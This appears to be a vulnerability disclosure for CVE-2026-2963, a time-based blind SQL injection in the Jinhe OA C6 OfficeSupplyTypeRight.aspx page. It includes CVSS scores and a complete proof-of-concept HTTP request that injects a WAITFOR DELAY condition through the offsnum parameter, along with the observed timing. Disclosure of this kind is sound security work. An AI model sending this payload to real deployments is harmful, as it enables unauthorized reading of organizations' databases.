Vendor of the products: Jinher (Beijing Jinhe Network Technology Co., Ltd.)
Vendor's website: http://www.jinher.com/ (Jinher-金和网络)
Affected products: Jinhe OA (Jinher C6 Collaborative Management Platform)
Affected version: C6
Reporter: smitug01
CVE ID: CVE-2026-2963
VulDB ID: VDB-347330 · GCVE-100-347330
| Metric | Score | Vector |
|---|---|---|
| CVSSv3 Base Score | 6.3 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
| CVSSv3 Temporal Score | 5.7 (23 Feb 2026) | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C |
| CVSSv2 Base Score | 6.5 | CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P |
| CVSSv2 Temporal Score | 5.1 (23 Feb 2026) | CVSS2#E:POC/RL:OF/RC:C |
Beijing Jinhe Network Technology Co., Ltd. (http://www.jinher.com/) develops collaborative management (OA) software and information technology solutions, supplying digital office platforms to government agencies and enterprises.
Jinhe OA C6 contains a SQL injection vulnerability in a front-end (user-facing) page, which an attacker can exploit to read sensitive data from the backing database.
Vulnerability Location: /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx
The OfficeSupplyTypeRight.aspx endpoint passes the user-controllable query parameters id and offsnum into a SQL query without sanitization or parameterization, resulting in a time-based blind SQL injection; the proof of concept below injects through offsnum.

Proof of concept: the current database name can be inferred from the response delay, because the injected WAITFOR DELAY executes only when the preceding IF condition is true.
GET /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx/?id=1&offsnum=1';+IF+(SELECT+DB_NAME())+=+'C6'+WAITFOR+DELAY+'0:0:6'--%20q HTTP/1.1
Host: *.*.*.*:8088
Accept-Language: zh-TW,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
The response was delayed by approximately 6 seconds (6,816 ms), matching the injected WAITFOR DELAY '0:0:6' and confirming both that the injected SQL executes and that the current database name is C6. As a control, the same request with a condition that is false (for example comparing DB_NAME() against a different name) should return without the delay; that rules out a slow server as the cause of the wait.
